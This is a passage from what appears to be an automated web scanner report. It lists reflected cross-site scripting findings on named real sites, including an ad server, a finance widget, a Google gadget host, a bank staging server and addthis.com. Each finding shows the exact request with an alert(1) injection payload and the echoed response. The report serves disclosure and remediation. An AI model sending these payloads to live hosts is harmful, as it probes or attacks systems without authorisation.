Content-Length: 1085
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 rhv192178010000 (MII-APC/1.6)


var ftGUID_136713="1274C36C794767";
var ftConfID_136713="0";
var ftParams_136713="click=http://ad.yieldmanager.com/clk?3,eAGljd1Og0AQhd-GKwSWBVkkxCwIWgLFJlVCbwiwC1vCXxZUytNbxfQFnOTMfDPJOQOgBU2ICkTu
...[SNIP]...
%3Bc%3D%24%7BCREATIVE_ID%7D%3Bz%3D%24%7BREQUESTID%7D%3Bg%3D%24%7BCAMPAIGN_ID%7D%3Bl%3D%24%7BBUYER_LINE_ITEM_ID%7D%3Bcv%3D%24%7BPRICE_CENTS%7D%3Bcm%3D%24%7BPRICING_TYPE%7D%3Bd%3D&ftx=&fty=&ftadz=&ftscw=ba893"-alert(1)-"034d86ca01a&cachebuster=51961.401011794806";
var ftKeyword_136713="";
var ftSegment_136713="";
var ftSegmentList_136713=[];
var ftRuleMatch_136713="0";

document.write('<scr'+'ipt src="http://cdn.flashtalkin
...[SNIP]...

1.330. http://servedby.flashtalking.com/imp/3/16303 [ftx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/16303

Issue detail

The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9178"-alert(1)-"efa9b764e0b was submitted in the ftx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/16303;136713;201;js;AkamaiUS;InMarketShoppers300x250/?click=http://ad.yieldmanager.com/clk?3,eAGljd1Og0AQhd-GKwSWBVkkxCwIWgLFJlVCbwiwC1vCXxZUytNbxfQFnOTMfDPJOQOgBU2ICkTuDb1ERDWABaBCYGVSAkpRsSwLaIapqghqijjtHIL9z.gF40BLFfxbXjkEG2FcuxHGu217RT.T9fsoDr-2E.LqZqN.94PJvL-Q6796w-c7qCsrdm7pTyk4JW.rvnHaMPGWqPPm6Oi3kQtYqh4u4fG92zfe5SrtlARdfDNiWxTZPI8PskykmeeELtIw0n6RyqGT84pLIxsfOa04nZitKcI69PRMbF0HhlAW9rmfKJ8znvdk6LL-oysozxjlVGiH0v4GeQhu0Q==,http%3A%2F%2Fvt.imiclk.com%2Fcgi%2Fvtc.cgi%3Fm%3D3%3Bv%3Dc%3Bc%3D%24%7BCREATIVE_ID%7D%3Bz%3D%24%7BREQUESTID%7D%3Bg%3D%24%7BCAMPAIGN_ID%7D%3Bl%3D%24%7BBUYER_LINE_ITEM_ID%7D%3Bcv%3D%24%7BPRICE_CENTS%7D%3Bcm%3D%24%7BPRICING_TYPE%7D%3Bd%3D&ftx=e9178"-alert(1)-"efa9b764e0b&fty=&ftadz=&ftscw=&cachebuster=51961.401011794806 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAAJ4Y0AAAAAAEcoJAAAAAAAAgCMAAIAAAAAAP8AAAACFnMOLwAAAAAA8EgjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAgAAAAAACF-YTBWM4j.NzMzMzMwAQAhfmEwVjOI.zczMzMzMAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADbsN2BPRpSCn5YJ3hBCLzP6RQpfXGSQEV1xUc8AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2416640099%26r%3D0%26s%3D1887835,65ee360e-a12a-11e0-acd2-5f612618ebf8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 02:01:11 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
Content-Length: 1085
pragma: no-cache
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 rhv192177010000 (MII-APC/1.6)


var ftGUID_136713="1274C36C794767";
var ftConfID_136713="0";
var ftParams_136713="click=http://ad.yieldmanager.com/clk?3,eAGljd1Og0AQhd-GKwSWBVkkxCwIWgLFJlVCbwiwC1vCXxZUytNbxfQFnOTMfDPJOQOgBU2ICkTu
...[SNIP]...
cgi%3Fm%3D3%3Bv%3Dc%3Bc%3D%24%7BCREATIVE_ID%7D%3Bz%3D%24%7BREQUESTID%7D%3Bg%3D%24%7BCAMPAIGN_ID%7D%3Bl%3D%24%7BBUYER_LINE_ITEM_ID%7D%3Bcv%3D%24%7BPRICE_CENTS%7D%3Bcm%3D%24%7BPRICING_TYPE%7D%3Bd%3D&ftx=e9178"-alert(1)-"efa9b764e0b&fty=&ftadz=&ftscw=&cachebuster=51961.401011794806";
var ftKeyword_136713="";
var ftSegment_136713="";
var ftSegmentList_136713=[];
var ftRuleMatch_136713="0";

document.write('<scr'+'ipt src="htt
...[SNIP]...

1.331. http://servedby.flashtalking.com/imp/3/16303 [fty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/16303

Issue detail

The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2df1c"-alert(1)-"748d2f69d24 was submitted in the fty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/16303;136713;201;js;AkamaiUS;InMarketShoppers300x250/?click=http://ad.yieldmanager.com/clk?3,eAGljd1Og0AQhd-GKwSWBVkkxCwIWgLFJlVCbwiwC1vCXxZUytNbxfQFnOTMfDPJOQOgBU2ICkTuDb1ERDWABaBCYGVSAkpRsSwLaIapqghqijjtHIL9z.gF40BLFfxbXjkEG2FcuxHGu217RT.T9fsoDr-2E.LqZqN.94PJvL-Q6796w-c7qCsrdm7pTyk4JW.rvnHaMPGWqPPm6Oi3kQtYqh4u4fG92zfe5SrtlARdfDNiWxTZPI8PskykmeeELtIw0n6RyqGT84pLIxsfOa04nZitKcI69PRMbF0HhlAW9rmfKJ8znvdk6LL-oysozxjlVGiH0v4GeQhu0Q==,http%3A%2F%2Fvt.imiclk.com%2Fcgi%2Fvtc.cgi%3Fm%3D3%3Bv%3Dc%3Bc%3D%24%7BCREATIVE_ID%7D%3Bz%3D%24%7BREQUESTID%7D%3Bg%3D%24%7BCAMPAIGN_ID%7D%3Bl%3D%24%7BBUYER_LINE_ITEM_ID%7D%3Bcv%3D%24%7BPRICE_CENTS%7D%3Bcm%3D%24%7BPRICING_TYPE%7D%3Bd%3D&ftx=&fty=2df1c"-alert(1)-"748d2f69d24&ftadz=&ftscw=&cachebuster=51961.401011794806 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAAJ4Y0AAAAAAEcoJAAAAAAAAgCMAAIAAAAAAP8AAAACFnMOLwAAAAAA8EgjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAgAAAAAACF-YTBWM4j.NzMzMzMwAQAhfmEwVjOI.zczMzMzMAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADbsN2BPRpSCn5YJ3hBCLzP6RQpfXGSQEV1xUc8AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2416640099%26r%3D0%26s%3D1887835,65ee360e-a12a-11e0-acd2-5f612618ebf8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 02:01:33 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
Content-Length: 1085
pragma: no-cache
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 rhv192176010000 (MII-APC/1.6)


var ftGUID_136713="1274C36C794767";
var ftConfID_136713="0";
var ftParams_136713="click=http://ad.yieldmanager.com/clk?3,eAGljd1Og0AQhd-GKwSWBVkkxCwIWgLFJlVCbwiwC1vCXxZUytNbxfQFnOTMfDPJOQOgBU2ICkTu
...[SNIP]...
Fm%3D3%3Bv%3Dc%3Bc%3D%24%7BCREATIVE_ID%7D%3Bz%3D%24%7BREQUESTID%7D%3Bg%3D%24%7BCAMPAIGN_ID%7D%3Bl%3D%24%7BBUYER_LINE_ITEM_ID%7D%3Bcv%3D%24%7BPRICE_CENTS%7D%3Bcm%3D%24%7BPRICING_TYPE%7D%3Bd%3D&ftx=&fty=2df1c"-alert(1)-"748d2f69d24&ftadz=&ftscw=&cachebuster=51961.401011794806";
var ftKeyword_136713="";
var ftSegment_136713="";
var ftSegmentList_136713=[];
var ftRuleMatch_136713="0";

document.write('<scr'+'ipt src="http://c
...[SNIP]...

1.332. http://servedby.flashtalking.com/imp/3/16303 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/16303

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84003"-alert(1)-"289bed32d7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/16303;136713;201;js;AkamaiUS;InMarketShoppers300x250/?click=http://ad.yieldmanager.com/clk?3,eAGljd1Og0AQhd-GKwSWBVkkxCwIWgLFJlVCbwiwC1vCXxZUytNbxfQFnOTMfDPJOQOgBU2ICkTuDb1ERDWABaBCYGVSAkpRsSwLaIapqghqijjtHIL9z.gF40BLFfxbXjkEG2FcuxHGu217RT.T9fsoDr-2E.LqZqN.94PJvL-Q6796w-c7qCsrdm7pTyk4JW.rvnHaMPGWqPPm6Oi3kQtYqh4u4fG92zfe5SrtlARdfDNiWxTZPI8PskykmeeELtIw0n6RyqGT84pLIxsfOa04nZitKcI69PRMbF0HhlAW9rmfKJ8znvdk6LL-oysozxjlVGiH0v4GeQhu0Q==,http%3A%2F%2Fvt.imiclk.com%2Fcgi%2Fvtc.cgi%3Fm%3D3%3Bv%3Dc%3Bc%3D%24%7BCREATIVE_ID%7D%3Bz%3D%24%7BREQUESTID%7D%3Bg%3D%24%7BCAMPAIGN_ID%7D%3Bl%3D%24%7BBUYER_LINE_ITEM_ID%7D%3Bcv%3D%24%7BPRICE_CENTS%7D%3Bcm%3D%24%7BPRICING_TYPE%7D%3Bd%3D&ftx=&fty=&ftadz=&ftscw=&cachebuster=51961.401011794806&84003"-alert(1)-"289bed32d7a=1 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAAJ4Y0AAAAAAEcoJAAAAAAAAgCMAAIAAAAAAP8AAAACFnMOLwAAAAAA8EgjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAgAAAAAACF-YTBWM4j.NzMzMzMwAQAhfmEwVjOI.zczMzMzMAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADbsN2BPRpSCn5YJ3hBCLzP6RQpfXGSQEV1xUc8AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2416640099%26r%3D0%26s%3D1887835,65ee360e-a12a-11e0-acd2-5f612618ebf8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 02:02:29 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache, no-store
Content-Length: 1088
pragma: no-cache
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 rhv192176010000 (MII-APC/1.6)


var ftGUID_136713="1274C36C794767";
var ftConfID_136713="0";
var ftParams_136713="click=http://ad.yieldmanager.com/clk?3,eAGljd1Og0AQhd-GKwSWBVkkxCwIWgLFJlVCbwiwC1vCXxZUytNbxfQFnOTMfDPJOQOgBU2ICkTu
...[SNIP]...
3D%24%7BREQUESTID%7D%3Bg%3D%24%7BCAMPAIGN_ID%7D%3Bl%3D%24%7BBUYER_LINE_ITEM_ID%7D%3Bcv%3D%24%7BPRICE_CENTS%7D%3Bcm%3D%24%7BPRICING_TYPE%7D%3Bd%3D&ftx=&fty=&ftadz=&ftscw=&cachebuster=51961.401011794806&84003"-alert(1)-"289bed32d7a=1";
var ftKeyword_136713="";
var ftSegment_136713="";
var ftSegmentList_136713=[];
var ftRuleMatch_136713="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/xre/13/136713/211599/js
...[SNIP]...

1.333. http://widgets.macroaxis.com/widgets/url.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.macroaxis.com
Path:   /widgets/url.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1ddf"-alert(1)-"d3d71cbfabd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/url.jsp?t=3&f1ddf"-alert(1)-"d3d71cbfabd=1 HTTP/1.1
Host: widgets.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www-open-opensocial.googleusercontent.com/gadgets/ifr?url=http%3A%2F%2Fwww.macroaxis.com%2Fmacro_sectors.xml&container=open&view=home&lang=all&country=ALL&debug=0&nocache=0&sanitize=0&v=1f66c60d1257dd9&source=http%3A%2F%2Feconintersect.com%2Fb2evolution%2Fblog1.php%2F2011%2F01%2F23%2Fsecondmarket-and-sharespost-the-new-market&parent=http%3A%2F%2Feconintersect.com%2Fb2evolution%2Fblog1.php%2F2011%2F01%2F23%2Fsecondmarket-and-sharespost-the-new-market&libs=core%3Acore.io%3Arpc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:23:57 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Content-Length: 2458
Content-Type: text/html;charset=ISO-8859-1


function iecheck() {
if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) {
var rslt = navigator.appVersion.match(/MSIE (\d+\.\d
...[SNIP]...
croaxis_sector_summary_frame' marginheight='0' marginwidth='0' SCROLLING='NO' height='405px' width='100%' frameborder='0' src='http://widgets.macroaxis.com/widgets/selectedPartnerSectors.jsp?gia=t&t=3&f1ddf"-alert(1)-"d3d71cbfabd=1'>
...[SNIP]...

1.334. http://widgets.macroaxis.com/widgets/url.jsp [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.macroaxis.com
Path:   /widgets/url.jsp

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c5b6'%3balert(1)//8b1acfceca2 was submitted in the t parameter. This input was echoed as 7c5b6';alert(1)//8b1acfceca2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/url.jsp?t=37c5b6'%3balert(1)//8b1acfceca2 HTTP/1.1
Host: widgets.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www-open-opensocial.googleusercontent.com/gadgets/ifr?url=http%3A%2F%2Fwww.macroaxis.com%2Fmacro_sectors.xml&container=open&view=home&lang=all&country=ALL&debug=0&nocache=0&sanitize=0&v=1f66c60d1257dd9&source=http%3A%2F%2Feconintersect.com%2Fb2evolution%2Fblog1.php%2F2011%2F01%2F23%2Fsecondmarket-and-sharespost-the-new-market&parent=http%3A%2F%2Feconintersect.com%2Fb2evolution%2Fblog1.php%2F2011%2F01%2F23%2Fsecondmarket-and-sharespost-the-new-market&libs=core%3Acore.io%3Arpc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:23:52 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Content-Length: 2070
Content-Type: text/html;charset=ISO-8859-1


function iecheck() {
if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) {
var rslt = navigator.appVersion.match(/MSIE (\d+\.\d
...[SNIP]...
";
document.lastChild.firstChild.appendChild(stylesheet);
}

function requestContent( local ) {

var script = document.createElement('script');
script.src = CONTENT_URL + '?t=37c5b6';alert(1)//8b1acfceca2&f=f&url=' + escape(local || location.href);
document.getElementsByTagName('head')[0].appendChild(script);
}

   this.init = function() {
    this.serverResponse = function(data) {
    if (!d
...[SNIP]...

1.335. http://www-open-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www-open-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fc22a%3balert(1)//b3cb9a7a3d7 was submitted in the url parameter. This input was echoed as fc22a;alert(1)//b3cb9a7a3d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=fc22a%3balert(1)//b3cb9a7a3d7&container=open&view=home&lang=all&country=ALL&debug=0&nocache=0&sanitize=0&v=1f66c60d1257dd9&source=http%3A%2F%2Feconintersect.com%2Fb2evolution%2Fblog1.php%2F2011%2F01%2F23%2Fsecondmarket-and-sharespost-the-new-market&parent=http%3A%2F%2Feconintersect.com%2Fb2evolution%2Fblog1.php%2F2011%2F01%2F23%2Fsecondmarket-and-sharespost-the-new-market&libs=core%3Acore.io%3Arpc HTTP/1.1
Host: www-open-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 502 Bad Gateway
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Tue, 28 Jun 2011 01:23:52 GMT
Expires: Tue, 28 Jun 2011 01:23:52 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 71
Server: GSE

Unable to retrieve spec for fc22a;alert(1)//b3cb9a7a3d7. HTTP error 502

1.336. http://www-stage.bankofamerica.com/surveys/bridge/surveybridge.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www-stage.bankofamerica.com
Path:   /surveys/bridge/surveybridge.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d1ef"><script>alert(1)</script>1d4a8d77866 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /surveys1d1ef"><script>alert(1)</script>1d4a8d77866/bridge/surveybridge.cfm HTTP/1.1
Host: www-stage.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:30:02 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www-stage.bankofamerica.com/surveys1d1ef"><script>alert(1)</script>1d4a8d77866/bridge/surveybridge.cfm">
...[SNIP]...

1.337. http://www-stage.bankofamerica.com/surveys/bridge/surveybridge.cfm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www-stage.bankofamerica.com
Path:   /surveys/bridge/surveybridge.cfm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 350d8"><script>alert(1)</script>b774da0debb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /surveys/bridge350d8"><script>alert(1)</script>b774da0debb/surveybridge.cfm HTTP/1.1
Host: www-stage.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 29 Jun 2011 12:30:03 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www-stage.bankofamerica.com/surveys/bridge350d8"><script>alert(1)</script>b774da0debb/surveybridge.cfm">
...[SNIP]...

1.338. http://www.addthis.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fa4b5<script>alert(1)</script>71875cfd142 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icofa4b5<script>alert(1)</script>71875cfd142 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; bt=1308921511|00004M01000004N010; uit=1; uid=4dce8a530508b02d; psc=0; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%2C%226%22%3A%223420415245200633085%22%7D..1309206707.1EY|1309206707.60|1309206707.1FE|1309206707.10R|1309085960.1OD|1309085960.1WV|1308921530.3M|1308921511.3N|1308225884.1VV|1308225884.19F; dt=X; ssh=eJwzMjA0NDAzMrcqSk1JySzRMawxgoiYWKUlJqcm5edn6xhaZ%2BSX5CZm5ugYAgA5tw4K; sshs=reddit%2Chotmail%2Cfacebook; Coyote-2-a0f0083=a0f02a8:0

Response

HTTP/1.0 404 Not Found
Date: Mon, 27 Jun 2011 20:32:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Content-Length: 1331
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>favicon.icofa4b5<script>alert(1)</script>71875cfd142</strong>
...[SNIP]...

1.339. http://www.addthis.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e672"-alert(1)-"fc1932dacfe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico3e672"-alert(1)-"fc1932dacfe HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; bt=1308921511|00004M01000004N010; uit=1; uid=4dce8a530508b02d; psc=0; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%2C%226%22%3A%223420415245200633085%22%7D..1309206707.1EY|1309206707.60|1309206707.1FE|1309206707.10R|1309085960.1OD|1309085960.1WV|1308921530.3M|1308921511.3N|1308225884.1VV|1308225884.19F; dt=X; ssh=eJwzMjA0NDAzMrcqSk1JySzRMawxgoiYWKUlJqcm5edn6xhaZ%2BSX5CZm5ugYAgA5tw4K; sshs=reddit%2Chotmail%2Cfacebook; Coyote-2-a0f0083=a0f02a8:0

Response

HTTP/1.0 404 Not Found
Date: Mon, 27 Jun 2011 20:32:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Content-Length: 1305
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/favicon.ico3e672"-alert(1)-"fc1932dacfe";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
